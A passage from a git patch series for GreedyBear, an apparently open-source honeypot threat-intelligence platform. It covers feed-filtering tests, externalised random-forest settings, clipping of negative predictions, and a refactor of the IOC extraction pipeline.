+        self.assertEqual(response.json()["count"], 2)
         self.assertEqual(response.json()["total_pages"], 1)
 
     def test_200_feeds_pagination_inclusion_mass(self):
         response = self.client.get("/api/feeds/?page_size=10&page=1&feed_type=all&attack_type=all&age=recent&include_mass_scanners")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json()["count"], 2)
+        self.assertEqual(response.json()["count"], 3)
 
     def test_200_feeds_pagination_inclusion_tor(self):
         response = self.client.get("/api/feeds/?page_size=10&page=1&feed_type=all&attack_type=all&age=recent&include_tor_exit_nodes")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json()["count"], 2)
+        self.assertEqual(response.json()["count"], 3)
 
     def test_200_feeds_pagination_inclusion_mass_and_tor(self):
         response = self.client.get("/api/feeds/?page_size=10&page=1&feed_type=all&attack_type=all&age=recent&include_mass_scanners&include_tor_exit_nodes")
         self.assertEqual(response.status_code, 200)
+        self.assertEqual(response.json()["count"], 4)
+
+    def test_200_feeds_filter_ip_only(self):
+        response = self.client.get("/api/feeds/all/all/recent.json?ioc_type=ip")
+        self.assertEqual(response.status_code, 200)
+        # Should only return IP addresses, not domains
+        for ioc in response.json()["iocs"]:
+            # Verify all returned values are IPs (contain dots and numbers pattern)
+            self.assertRegex(ioc["value"], r"^\d+\.\d+\.\d+\.\d+$")
+
+    def test_200_feeds_filter_domain_only(self):
+        response = self.client.get("/api/feeds/all/all/recent.json?ioc_type=domain")
+        self.assertEqual(response.status_code, 200)
+        # Should only return domains, not IPs
+        self.assertGreater(len(response.json()["iocs"]), 0)
+        for ioc in response.json()["iocs"]:
+            # Verify all returned values are domains (contain alphabetic characters)
+            self.assertRegex(ioc["value"], r"[a-zA-Z]")
+
+    def test_200_feeds_pagination_filter_ip(self):
+        response = self.client.get(
+            "/api/feeds/?page_size=10&page=1&feed_type=all&attack_type=all&age=recent&ioc_type=ip&include_mass_scanners&include_tor_exit_nodes"
+        )
+        self.assertEqual(response.status_code, 200)
+        # Should return only IPs (3 in test data)
         self.assertEqual(response.json()["count"], 3)
 
+    def test_200_feeds_pagination_filter_domain(self):
+        response = self.client.get("/api/feeds/?page_size=10&page=1&feed_type=all&attack_type=all&age=recent&ioc_type=domain")
+        self.assertEqual(response.status_code, 200)
+        # Should return only domains (1 in test data)
+        self.assertEqual(response.json()["count"], 1)
+
     def test_400_feeds_pagination(self):
         response = self.client.get("/api/feeds/?page_size=10&page=1&feed_type=all&attack_type=test&age=recent")
         self.assertEqual(response.status_code, 400)
@@ -152,12 +194,17 @@ def test_200_all_feeds(self):
             self.assertEqual(response.json()["license"], settings.FEEDS_LICENSE)
         else:
             self.assertNotIn("license", response.json())
-        self.assertEqual(response.json()["iocs"][0]["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
-        self.assertEqual(response.json()["iocs"][0]["attack_count"], 1)
-        self.assertEqual(response.json()["iocs"][0]["scanner"], True)
-        self.assertEqual(response.json()["iocs"][0]["payload_request"], True)
-        self.assertEqual(response.json()["iocs"][0]["recurrence_probability"], self.ioc.recurrence_probability)
-        self.assertEqual(response.json()["iocs"][0]["expected_interactions"], self.ioc.expected_interactions)
+
+        iocs = response.json()["iocs"]
+        target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
+        self.assertIsNotNone(target_ioc)
+
+        self.assertEqual(target_ioc["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
+        self.assertEqual(target_ioc["attack_count"], 1)
+        self.assertEqual(target_ioc["scanner"], True)
+        self.assertEqual(target_ioc["payload_request"], True)
+        self.assertEqual(target_ioc["recurrence_probability"], self.ioc.recurrence_probability)
+        self.assertEqual(target_ioc["expected_interactions"], self.ioc.expected_interactions)
 
     def test_200_general_feeds(self):
         response = self.client.get("/api/feeds/advanced/?feed_type=heralding")
@@ -166,12 +213,17 @@ def test_200_general_feeds(self):
             self.assertEqual(response.json()["license"], settings.FEEDS_LICENSE)
         else:
             self.assertNotIn("license", response.json())
-        self.assertEqual(response.json()["iocs"][0]["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
-        self.assertEqual(response.json()["iocs"][0]["attack_count"], 1)
-        self.assertEqual(response.json()["iocs"][0]["scanner"], True)
-        self.assertEqual(response.json()["iocs"][0]["payload_request"], True)
-        self.assertEqual(response.json()["iocs"][0]["recurrence_probability"], self.ioc.recurrence_probability)
-        self.assertEqual(response.json()["iocs"][0]["expected_interactions"], self.ioc.expected_interactions)
+
+        iocs = response.json()["iocs"]
+        target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
+        self.assertIsNotNone(target_ioc)
+
+        self.assertEqual(target_ioc["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
+        self.assertEqual(target_ioc["attack_count"], 1)
+        self.assertEqual(target_ioc["scanner"], True)
+        self.assertEqual(target_ioc["payload_request"], True)
+        self.assertEqual(target_ioc["recurrence_probability"], self.ioc.recurrence_probability)
+        self.assertEqual(target_ioc["expected_interactions"], self.ioc.expected_interactions)
 
     def test_400_feeds(self):
         response = self.client.get("/api/feeds/advanced/?attack_type=test")
@@ -180,7 +232,7 @@ def test_400_feeds(self):
     def test_200_feeds_pagination(self):
         response = self.client.get("/api/feeds/advanced/?paginate=true&page_size=10&page=1")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json()["count"], 3)
+        self.assertEqual(response.json()["count"], 4)
         self.assertEqual(response.json()["total_pages"], 1)
 
     def test_200_feeds_pagination_include(self):
@@ -192,13 +244,13 @@ def test_200_feeds_pagination_include(self):
     def test_200_feeds_pagination_exclude_mass(self):
         response = self.client.get("/api/feeds/advanced/?paginate=true&page_size=10&page=1&exclude_reputation=mass%20scanner")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json()["count"], 2)
+        self.assertEqual(response.json()["count"], 3)
         self.assertEqual(response.json()["total_pages"], 1)
 
     def test_200_feeds_pagination_exclude_tor(self):
         response = self.client.get("/api/feeds/advanced/?paginate=true&page_size=10&page=1&exclude_reputation=tor%20exit%20node")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json()["count"], 2)
+        self.assertEqual(response.json()["count"], 3)
         self.assertEqual(response.json()["total_pages"], 1)
 
     def test_400_feeds_pagination(self):
@@ -247,9 +299,10 @@ def test_200_feed_types(self):
 
         response = self.client.get("/api/statistics/feeds_types")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json()[0]["Heralding"], 2)
+        # Expecting 3 because setupTestData creates 3 IOCs (ioc, ioc_2, ioc_domain) associated with Heralding
+        self.assertEqual(response.json()[0]["Heralding"], 3)
         self.assertEqual(response.json()[0]["Ciscoasa"], 2)
-        self.assertEqual(response.json()[0]["Log4j"], 2)
+        self.assertEqual(response.json()[0]["Log4j"], 3)
         self.assertEqual(response.json()[0]["Cowrie"], 3)
         self.assertEqual(response.json()[0]["Tanner"], 0)
 

From 102fc2514f0b6909bfd4bde85dbfc79085cc5ef6 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Fri, 19 Dec 2025 02:02:49 +0530
Subject: [PATCH 03/75] Refactor: Externalize Random Forest Parameters. (#623)

* Refactor: Externalize Random Forest Hyperparameters to Settings #614

* refactor: rename ML_CONFIG_PATH to ML_CONFIG_FILE

* refactor: Replace `ML_CONFIG_PATH` with `ML_CONFIG_FILE` for consistency.

* test: add tests for externalized random forest configuration
---
 configuration/ml_config.json                 | 22 +++++++++++
 greedybear/cronjobs/scoring/random_forest.py | 31 +++++++--------
 greedybear/settings.py                       |  1 +
 tests/test_rf_config.py                      | 41 ++++++++++++++++++++
 4 files changed, 78 insertions(+), 17 deletions(-)
 create mode 100644 configuration/ml_config.json
 create mode 100644 tests/test_rf_config.py

diff --git a/configuration/ml_config.json b/configuration/ml_config.json
new file mode 100644
index 00000000..b649f252
--- /dev/null
+++ b/configuration/ml_config.json
@@ -0,0 +1,22 @@
+{
+    "RFClassifier": {
+        "class_weight": {
+            "false": 1,
+            "true": 4
+        },
+        "criterion": "entropy",
+        "max_depth": 10,
+        "max_features": "log2",
+        "min_samples_leaf": 6,
+        "min_samples_split": 3,
+        "n_estimators": 241
+    },
+    "RFRegressor": {
+        "criterion": "squared_error",
+        "max_depth": 11,
+        "max_features": "sqrt",
+        "min_samples_leaf": 3,
+        "min_samples_split": 8,
+        "n_estimators": 70
+    }
+}
\ No newline at end of file
diff --git a/greedybear/cronjobs/scoring/random_forest.py b/greedybear/cronjobs/scoring/random_forest.py
index fcf012ec..073dd31a 100755
--- a/greedybear/cronjobs/scoring/random_forest.py
+++ b/greedybear/cronjobs/scoring/random_forest.py
@@ -1,9 +1,11 @@
+import json
 from abc import abstractmethod
 
 import pandas as pd
 from greedybear.cronjobs.scoring.consts import MULTI_VAL_FEATURES, NUM_FEATURES
 from greedybear.cronjobs.scoring.ml_model import Classifier, MLModel, Regressor
 from greedybear.cronjobs.scoring.utils import multi_label_encode
+from greedybear.settings import ML_CONFIG_FILE
 from sklearn.base import BaseEstimator
 from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
 
@@ -84,15 +86,14 @@ def untrained_model(self) -> BaseEstimator:
             BaseEstimator: Configured but untrained scikit-learn Random Forest
                 Classifier with all hyperparameters set
         """
-        params = {
-            "class_weight": {False: 1, True: 4},
-            "criterion": "entropy",
-            "max_depth": 10,
-            "max_features": "log2",
-            "min_samples_leaf": 6,
-            "min_samples_split": 3,
-            "n_estimators": 241,
-        }
+        with open(ML_CONFIG_FILE, "r") as f:
+            config = json.load(f)
+
+        params = config["RFClassifier"]
+        # Convert class_weight keys from string to boolean
+        if "class_weight" in params:
+            params["class_weight"] = {(k.lower() == "true"): v for k, v in params["class_weight"].items() if k.lower() in ["true", "false"]}
+
         return RandomForestClassifier(**params)
 
 
@@ -117,12 +118,8 @@ def untrained_model(self) -> BaseEstimator:
             BaseEstimator: Configured but untrained scikit-learn Random Forest
                 Regressor with all hyperparameters set
         """
-        params = {
-            "criterion": "squared_error",
-            "max_depth": 11,
-            "max_features": "sqrt",
-            "min_samples_leaf": 3,
-            "min_samples_split": 8,
-            "n_estimators": 70,
-        }
+        with open(ML_CONFIG_FILE, "r") as f:
+            config = json.load(f)
+
+        params = config["RFRegressor"]
         return RandomForestRegressor(**params)
diff --git a/greedybear/settings.py b/greedybear/settings.py
index 78b31e5d..207515c8 100644
--- a/greedybear/settings.py
+++ b/greedybear/settings.py
@@ -19,6 +19,7 @@
 
 DJANGO_LOG_DIRECTORY = "/var/log/greedybear/django"
 ML_MODEL_DIRECTORY = os.path.join(BASE_DIR, "mlmodels/")  # "/opt/deploy/greedybear/mlmodels"
+ML_CONFIG_FILE = os.path.join(BASE_DIR, "configuration/ml_config.json")
 MOCK_CONNECTIONS = os.environ.get("MOCK_CONNECTIONS", "False") == "True"
 STAGE = os.environ.get("ENVIRONMENT", "production")
 STAGE_PRODUCTION = STAGE == "production"
diff --git a/tests/test_rf_config.py b/tests/test_rf_config.py
new file mode 100644
index 00000000..3e66f47c
--- /dev/null
+++ b/tests/test_rf_config.py
@@ -0,0 +1,41 @@
+import json
+
+from django.test import SimpleTestCase
+from greedybear.cronjobs.scoring.random_forest import RFClassifier, RFRegressor
+from greedybear.settings import ML_CONFIG_FILE
+
+
+class TestRFConfig(SimpleTestCase):
+    def setUp(self):
+        with open(ML_CONFIG_FILE, "r") as f:
+            self.config = json.load(f)
+
+    def test_rf_classifier_config_loading(self):
+        """
+        Verify that RFClassifier correctly loads parameters from the actual configuration file.
+        This ensures that the ml_config.json file is valid and its values are being respected.
+        """
+        params = self.config["RFClassifier"]
+        # Apply the same transformation logic as the class
+        if "class_weight" in params:
+            params["class_weight"] = {(k.lower() == "true"): v for k, v in params["class_weight"].items() if k.lower() in ["true", "false"]}
+
+        classifier = RFClassifier()
+        model = classifier.untrained_model
+
+        for key, value in params.items():
+            actual_value = getattr(model, key)
+            self.assertEqual(actual_value, value, f"RFClassifier parameter '{key}' mismatch. Config: {value}, Model: {actual_value}")
+
+    def test_rf_regressor_config_loading(self):
+        """
+        Verify that RFRegressor correctly loads parameters from the actual configuration file.
+        """
+        params = self.config["RFRegressor"]
+
+        regressor = RFRegressor()
+        model = regressor.untrained_model
+
+        for key, value in params.items():
+            actual_value = getattr(model, key)
+            self.assertEqual(actual_value, value, f"RFRegressor parameter '{key}' mismatch. Config: {value}, Model: {actual_value}")

From 3f9434e3878cc3c13da7a8998ea4f58e2cb68513 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Fri, 19 Dec 2025 14:37:15 +0530
Subject: [PATCH 04/75] fix(ml_model): clip predictions to non-negative values
 (#626)

- Enforce non-negative predictions in Regressor.predict using np.maximum
- Add test case in TestRegressor to verify negative values are clipped
- Fixes issue with negative expected_interactions causing API errors
---
 greedybear/cronjobs/scoring/ml_model.py |  3 ++-
 tests/test_rf_models.py                 | 13 +++++++++++++
 2 files changed, 15 insertions(+), 1 deletion(-)

diff --git a/greedybear/cronjobs/scoring/ml_model.py b/greedybear/cronjobs/scoring/ml_model.py
index 64aec0b4..dae31f23 100644
--- a/greedybear/cronjobs/scoring/ml_model.py
+++ b/greedybear/cronjobs/scoring/ml_model.py
@@ -297,4 +297,5 @@ def predict(self, X: pd.DataFrame) -> np.ndarray:
         Returns:
             np.ndarray: Array of predicted values with shape (n_samples,)
         """
-        return self.model.predict(X)
+        predictions = self.model.predict(X)
+        return np.maximum(predictions, 0)
diff --git a/tests/test_rf_models.py b/tests/test_rf_models.py
index 482c4cf9..647e704c 100644
--- a/tests/test_rf_models.py
+++ b/tests/test_rf_models.py
@@ -101,3 +101,16 @@ def test_rf_regressor(self):
 
         auc = regressor.recall_auc(df, training_target)
         self.assertEqual(0 <= auc <= 1, True)
+
+    def test_negative_predictions(self):
+        """Test that negative predictions are clipped to 0"""
+        regressor = self.MockRFRegressor()
+        regressor.model = regressor.untrained_model
+
+        # Set return value with negative numbers
+        regressor.model.predict.return_value = np.array([-10, 5, 0, -1, 2])
+
+        predictions = regressor.predict(SAMPLE_DATA)
+
+        expected = np.array([0, 5, 0, 0, 2])
+        np.testing.assert_array_equal(predictions, expected)

From d5a9906da5cd3ebf293ffedc77f466400cf0b1be Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Sat, 20 Dec 2025 17:55:24 +0100
Subject: [PATCH 05/75] Refactor extraction process. Closes #622. (#624)

* add repositories for abstraction of data access

* add tests for repositories

* update constant with fields required for extraction

* delete file with tests for time windows calculation
(this is now tested together with the elastic repository)

* add class to process incoming IOC records

* collect utility functions in a separate file

* add test fixtures for new tests

* adapt existing tests

* add tests for IOC processor

* add tests for extraction utils

* rename argument

* add extraction strategies

* add tests for extraction strategies

* add pipeline class for orchestration of the extraction process
with configurable initial extraction interval

* add extraction job

* replace old extraction job with new one in the scheduler

* remove old files

* remove unused ElasticJob class

* remove obsolete test

* fix broken f-string

* catch and log failing extractions

* improve logging in ExtractionPipeline

* add description of the extraction process
---
 EXTRACTION_PROCESS.md                         |  40 ++
 docker/env_file_template                      |   3 +
 greedybear/celery.py                          |  23 +-
 greedybear/consts.py                          |  21 +-
 greedybear/cronjobs/attacks.py                | 221 ---------
 greedybear/cronjobs/base.py                   |  77 ----
 greedybear/cronjobs/cowrie.py                 | 192 --------
 greedybear/cronjobs/extract.py                |  13 +
 .../cronjobs/extraction/ioc_processor.py      | 110 +++++
 greedybear/cronjobs/extraction/pipeline.py    |  88 ++++
 .../extraction/strategies/__init__.py         |   4 +
 .../cronjobs/extraction/strategies/base.py    |  48 ++
 .../cronjobs/extraction/strategies/cowrie.py  | 195 ++++++++
 .../cronjobs/extraction/strategies/factory.py |  39 ++
 .../cronjobs/extraction/strategies/generic.py |  30 ++
 .../{ => extraction/strategies}/log4pot.py    |  97 ++--
 greedybear/cronjobs/extraction/utils.py       | 172 +++++++
 greedybear/cronjobs/general.py                |  43 --
 greedybear/cronjobs/honeypots.py              |   9 -
 greedybear/cronjobs/repositories/__init__.py  |   4 +
 .../cronjobs/repositories/cowrie_session.py   |  76 ++++
 greedybear/cronjobs/repositories/elastic.py   | 119 +++++
 greedybear/cronjobs/repositories/ioc.py       | 136 ++++++
 greedybear/cronjobs/repositories/sensor.py    |  58 +++
 greedybear/cronjobs/sensors.py                |  50 --
 greedybear/settings.py                        |   1 +
 greedybear/tasks.py                           |  30 +-
 tests/__init__.py                             |  40 ++
 tests/greedybear/__init__.py                  |   0
 tests/greedybear/cronjobs/__init__.py         |   0
 .../cronjobs/only_manual/test_cowrie.py       |  16 -
 .../cronjobs/only_manual/test_general.py      |  28 --
 .../cronjobs/only_manual/test_log4pot.py      |  16 -
 .../cronjobs/only_manual/test_sensors.py      |  16 -
 tests/test_extraction.py                      |  69 ---
 tests/test_extraction_strategies.py           |  83 ++++
 tests/test_extraction_utils.py                | 319 +++++++++++++
 tests/test_ioc_processor.py                   | 308 +++++++++++++
 tests/test_repositories.py                    | 427 ++++++++++++++++++
 tests/test_scoring_utils.py                   |   3 +-
 tests/test_views.py                           |  12 +-
 41 files changed, 2393 insertions(+), 843 deletions(-)
 create mode 100644 EXTRACTION_PROCESS.md
 delete mode 100644 greedybear/cronjobs/attacks.py
 delete mode 100644 greedybear/cronjobs/cowrie.py
 create mode 100644 greedybear/cronjobs/extract.py
 create mode 100644 greedybear/cronjobs/extraction/ioc_processor.py
 create mode 100644 greedybear/cronjobs/extraction/pipeline.py
 create mode 100644 greedybear/cronjobs/extraction/strategies/__init__.py
 create mode 100644 greedybear/cronjobs/extraction/strategies/base.py
 create mode 100644 greedybear/cronjobs/extraction/strategies/cowrie.py
 create mode 100644 greedybear/cronjobs/extraction/strategies/factory.py
 create mode 100644 greedybear/cronjobs/extraction/strategies/generic.py
 rename greedybear/cronjobs/{ => extraction/strategies}/log4pot.py (66%)
 create mode 100644 greedybear/cronjobs/extraction/utils.py
 delete mode 100644 greedybear/cronjobs/general.py
 delete mode 100644 greedybear/cronjobs/honeypots.py
 create mode 100644 greedybear/cronjobs/repositories/__init__.py
 create mode 100644 greedybear/cronjobs/repositories/cowrie_session.py
 create mode 100644 greedybear/cronjobs/repositories/elastic.py
 create mode 100644 greedybear/cronjobs/repositories/ioc.py
 create mode 100644 greedybear/cronjobs/repositories/sensor.py
 delete mode 100644 greedybear/cronjobs/sensors.py
 delete mode 100644 tests/greedybear/__init__.py
 delete mode 100644 tests/greedybear/cronjobs/__init__.py
 delete mode 100644 tests/greedybear/cronjobs/only_manual/test_cowrie.py
 delete mode 100644 tests/greedybear/cronjobs/only_manual/test_general.py
 delete mode 100644 tests/greedybear/cronjobs/only_manual/test_log4pot.py
 delete mode 100644 tests/greedybear/cronjobs/only_manual/test_sensors.py
 delete mode 100644 tests/test_extraction.py
 create mode 100644 tests/test_extraction_strategies.py
 create mode 100644 tests/test_extraction_utils.py
 create mode 100644 tests/test_ioc_processor.py
 create mode 100644 tests/test_repositories.py

diff --git a/EXTRACTION_PROCESS.md b/EXTRACTION_PROCESS.md
new file mode 100644
index 00000000..c3eee43e
--- /dev/null
+++ b/EXTRACTION_PROCESS.md
@@ -0,0 +1,40 @@
+# Extraction Process
+
+This file offers an overview of how GreedyBear extracts and processes T-Pot data. The ExtractionJob shown in the diagram runs every 10 minutes by default.
+
+```mermaid
+sequenceDiagram
+    participant Job as ExtractionJob
+    participant Pipeline as ExtractionPipeline
+    participant Elastic as ElasticRepository
+    participant Factory as StrategyFactory
+    participant Strategy as ExtractionStrategy
+    participant Processor as IocProcessor
+    participant Repo as IocRepository
+    
+    Job->>Pipeline: execute()
+    Pipeline->>Elastic: search(minutes_back)
+    Elastic-->>Pipeline: hits[]
+    
+    loop Each honeypot
+        Pipeline->>Factory: get_strategy(honeypot)
+        Factory-->>Pipeline: strategy
+        Pipeline->>Strategy: extract_from_hits(hits)
+        Strategy->>Strategy: iocs_from_hits(hits)
+        
+        loop Each IOC
+            Strategy->>Processor: add_ioc(ioc)
+            Processor->>Repo: get_ioc_by_name(name)
+            alt IOC exists
+                Processor->>Processor: merge_iocs()
+                Processor->>Repo: save(ioc)
+            else New IOC
+                Processor->>Repo: save(ioc)
+            end
+        end
+    end
+    
+    Pipeline->>Pipeline: UpdateScores()
+```
+
+A single ExtractionPipeline instance orchestrates the extraction of all available honeypots. Is uses the ElasticRepository to receive a list of all honeypot hits from a certain time window. For each honeypot it gets the corresponding ExtractionStrategy, which contains all the extraction logic that is specific for a certain type of honeypot (e.g. Cowrie). The ExtractionStrategy uses this logic to create IOC objects and hands them to the IocProcessor, which is responsible for processing them so they can be written to the database via the IocRepository. 
\ No newline at end of file
diff --git a/docker/env_file_template b/docker/env_file_template
index 884cdd00..2da34e56 100644
--- a/docker/env_file_template
+++ b/docker/env_file_template
@@ -47,6 +47,9 @@ LEGACY_EXTRACTION=False
 # Interval for the honeypot data extraction in minutes (only choose divisors of 60)
 EXTRACTION_INTERVAL=10
 
+# Lookback time for the first extraction run in minutes (default: 1 day)
+INITIAL_EXTRACTION_TIMESPAN = 1440
+
 # Set True to cluster command sequences recorded by Cowrie once a day
 # This might be computationaly expensive on large Databases
 CLUSTER_COWRIE_COMMAND_SEQUENCES=False
diff --git a/greedybear/celery.py b/greedybear/celery.py
index 27693e6f..0e9847e5 100644
--- a/greedybear/celery.py
+++ b/greedybear/celery.py
@@ -59,30 +59,11 @@ def setup_loggers(*args, **kwargs):
 hp_extraction_interval = 10 if LEGACY_EXTRACTION else EXTRACTION_INTERVAL
 app.conf.beat_schedule = {
     # every 10 minutes or according to EXTRACTION_INTERVAL
-    "extract_log4pot": {
-        "task": "greedybear.tasks.extract_log4pot",
+    "extract_all": {
+        "task": "greedybear.tasks.extract_all",
         "schedule": crontab(minute=f"*/{hp_extraction_interval}"),
         "options": {"queue": "default", "countdown": 10},
     },
-    # every 10 minutes or according to EXTRACTION_INTERVAL
-    "extract_cowrie": {
-        "task": "greedybear.tasks.extract_cowrie",
-        "schedule": crontab(minute=f"*/{hp_extraction_interval}"),
-        "options": {"queue": "default", "countdown": 10},
-    },
-    # FEEDS
-    # every 10 minutes or according to EXTRACTION_INTERVAL
-    "extract_general": {
-        "task": "greedybear.tasks.extract_general",
-        "schedule": crontab(minute=f"*/{hp_extraction_interval}"),
-        "options": {"queue": "default", "countdown": 10},
-    },
-    # once a day
-    "extract_sensors": {
-        "task": "greedybear.tasks.extract_sensors",
-        "schedule": crontab(hour=0),
-        "options": {"queue": "default"},
-    },
     # once an hour
     "monitor_honeypots": {
         "task": "greedybear.tasks.monitor_honeypots",
diff --git a/greedybear/consts.py b/greedybear/consts.py
index 82cc4caf..0e8eefe6 100644
--- a/greedybear/consts.py
+++ b/greedybear/consts.py
@@ -13,4 +13,23 @@
 DOMAIN = "domain"
 IP = "ip"
 
-ATTACK_DATA_FIELDS = ["@timestamp", "src_ip", "dest_port", "ip_rep", "geoip"]
+REQUIRED_FIELDS = [
+    "@timestamp",
+    "src_ip",
+    "dest_port",
+    "ip_rep",
+    "geoip",
+    "deobfuscated_payload",
+    "correlation_id",
+    "url",
+    "message",
+    "reason",
+    "correlation_id",
+    "eventid",
+    "session",
+    "timestamp",
+    "duration",
+    "username",
+    "password",
+    "t-pot_ip_ext",
+]
diff --git a/greedybear/cronjobs/attacks.py b/greedybear/cronjobs/attacks.py
deleted file mode 100644
index b8eca76f..00000000
--- a/greedybear/cronjobs/attacks.py
+++ /dev/null
@@ -1,221 +0,0 @@
-# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
-# See the file 'LICENSE' for copying permission.
-import json
-from abc import ABCMeta
-from collections import defaultdict
-from datetime import datetime
-from ipaddress import IPv4Address, ip_address
-from urllib.parse import urlparse
-
-import requests
-from django.conf import settings
-from greedybear.consts import DOMAIN, IP, PAYLOAD_REQUEST, SCANNER
-from greedybear.cronjobs.base import ElasticJob
-from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
-from greedybear.cronjobs.sensors import ExtractSensors
-from greedybear.models import IOC, GeneralHoneypot, MassScanners, Sensors, WhatsMyIP, iocType
-from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
-
-
-class ExtractAttacks(ElasticJob, metaclass=ABCMeta):
-    def __init__(self, minutes_back=None):
-        super().__init__()
-        self.first_time_run = False
-        self.minutes_back = minutes_back
-        self.whitelist = set(Sensors.objects.all())
-        self.ioc_records = []
-
-    @property
-    def minutes_back_to_lookup(self):
-        # overwrite base
-        if self.minutes_back:
-            minutes = self.minutes_back
-        elif self.first_time_run:
-            minutes = 60 * 24 * 3  # 3 days
-        else:
-            minutes = 11 if LEGACY_EXTRACTION else EXTRACTION_INTERVAL
-        return minutes
-
-    def _add_ioc(self, ioc, attack_type: str, general=None):
-        self.log.info(f"saving ioc {ioc} for attack_type {attack_type}")
-        if ioc.name in self.whitelist:
-            self.log.info(f"not saved {ioc} because is whitelisted")
-            return False
-
-        try:
-            ioc_record = IOC.objects.get(name=ioc.name)
-        except IOC.DoesNotExist:
-            # Create
-            ioc_record = ioc
-            ioc_record.save()
-        else:
-            # Update
-            ioc_record.last_seen = ioc.last_seen
-            ioc_record.attack_count += 1
-            ioc_record.interaction_count += ioc.interaction_count
-            ioc_record.related_urls = sorted(set(ioc_record.related_urls + ioc.related_urls))
-            ioc_record.destination_ports = sorted(set(ioc_record.destination_ports + ioc.destination_ports))
-            ioc_record.ip_reputation = ioc.ip_reputation
-            ioc_record.asn = ioc.asn
-            ioc_record.login_attempts += ioc.login_attempts
-
-        if general is not None:
-            if general not in ioc_record.general_honeypot.all():
-                ioc_record.general_honeypot.add(GeneralHoneypot.objects.get(name=general))
-
-        if len(ioc_record.days_seen) == 0 or ioc_record.days_seen[-1] != ioc_record.last_seen.date():
-            ioc_record.days_seen.append(ioc_record.last_seen.date())
-            ioc_record.number_of_days_seen = len(ioc_record.days_seen)
-        ioc_record.scanner = attack_type == SCANNER
-        ioc_record.payload_request = attack_type == PAYLOAD_REQUEST
-
-        filtered = False
-        if ioc_record.type == iocType.DOMAIN:
-            filtered = self._filter_whatsmyip(ioc_record.name)
-
-        if filtered:
-            return None
-        else:
-            ioc_record.save()
-            self.ioc_records.append(ioc_record)
-            self._threatfox_submission(ioc_record, ioc.related_urls)
-            return ioc_record
-
-    def _filter_whatsmyip(self, domain):
-        try:
-            WhatsMyIP.objects.get(domain=domain)
-        except WhatsMyIP.DoesNotExist:
-            return False
-        else:
-            self.log.info(f"{domain=} is a whats-my-ip domain. Filtering it.")
-            return True
-
-    def _threatfox_submission(self, ioc_record: "IOC", related_urls: list):
-        # we submit only payload request IOCs for now because they are more reliable
-        if not ioc_record.payload_request:
-            return
-
-        if not settings.THREATFOX_API_KEY:
-            self.log.warning("Threatfox API Key not available")
-            return
-
-        urls_to_submit = []
-        # submit only URLs with paths to avoid false positives
-        for related_url in related_urls:
-            parsed_url = urlparse(related_url)
-            if parsed_url.path not in ["", "/"]:
-                urls_to_submit.append(related_url)
-            else:
-                self.log.info(f"skipping export of {related_url} cause has not path")
-
-        headers = {"Auth-Key": settings.THREATFOX_API_KEY}
-
-        self.log.info(f"submitting IOC {related_urls} to Threatfox")
-
-        seen_honeypots = []
-        if ioc_record.cowrie:
-            seen_honeypots.append("cowrie")
-        if ioc_record.log4j:
-            seen_honeypots.append("log4pot")
-        for honeypot in ioc_record.general_honeypot.all():
-            seen_honeypots.append(honeypot.name)
-        seen_honeypots_str = ", ".join(seen_honeypots)
-
-        json_data = {
-            "query": "submit_ioc",
-            "threat_type": "payload_delivery",
-            "ioc_type": "url",
-            "malware": "unknown",
-            "confidence_level": "75",
-            "reference": "https://greedybear.honeynet.org",
-            "comment": f"Seen requesting a payload from {seen_honeypots_str} honeypot and collected in Greedybear, the Threat Intel Platform for T-POTs.",
-            "anonymous": 0,
-            "tags": ["honeypot"],
-            "iocs": urls_to_submit,
-        }
-        try:
-            r = requests.post("https://threatfox-api.abuse.ch/api/v1/", headers=headers, json=json_data, timeout=5)
-        except requests.RequestException as e:
-            self.log.exception(f"Threatfox push error: {e}")
-        else:
-            self.log.info(f"Threatfox submission successful. Received response: {r.text}")
-
-    def _get_attacker_data(self, honeypot, fields: list) -> list:
-        hits_by_ip = defaultdict(list)
-        search = self._base_search(honeypot)
-        search.source(fields)
-        for hit in search.iterate():
-            if "src_ip" not in hit:
-                continue
-            hits_by_ip[hit.src_ip].append(hit.to_dict())
-        iocs = []
-        for ip, hits in hits_by_ip.items():
-            # skip empty IP addresses
-            if not ip.strip():
-                continue
-            dest_ports = [hit["dest_port"] for hit in hits if "dest_port" in hit]
-            extracted_ip = ip_address(ip)
-            if extracted_ip.is_loopback or extracted_ip.is_private or extracted_ip.is_multicast or extracted_ip.is_link_local or extracted_ip.is_reserved:
-                continue
-
-            ioc = IOC(
-                name=ip,
-                type=self._get_ioc_type(ip),
-                interaction_count=len(hits),
-                ip_reputation=self._get_ip_reputation(ip, hits[0]),
-                asn=hits[0].get("geoip", {}).get("asn"),
-                destination_ports=sorted(set(dest_ports)),
-                login_attempts=len(hits) if honeypot.name == "Heralding" else 0,
-            )
-            timestamps = [hit["@timestamp"] for hit in hits if "@timestamp" in hit]
-            if timestamps:
-                ioc.first_seen = datetime.fromisoformat(min(timestamps))
-                ioc.last_seen = datetime.fromisoformat(max(timestamps))
-            iocs.append(ioc)
-        return iocs
-
-    def _get_ip_reputation(self, ip, hit):
-        ip_reputation = hit.get("ip_rep", "")
-        # we have seen "mass scanners" incorrectly flagged as "known attacker"
-        if not ip_reputation or ip_reputation == "known attacker":
-            try:
-                MassScanners.objects.get(ip_address=ip)
-            except MassScanners.DoesNotExist:
-                pass
-            else:
-                self.log.info(f"IP {ip} is a mass scanner")
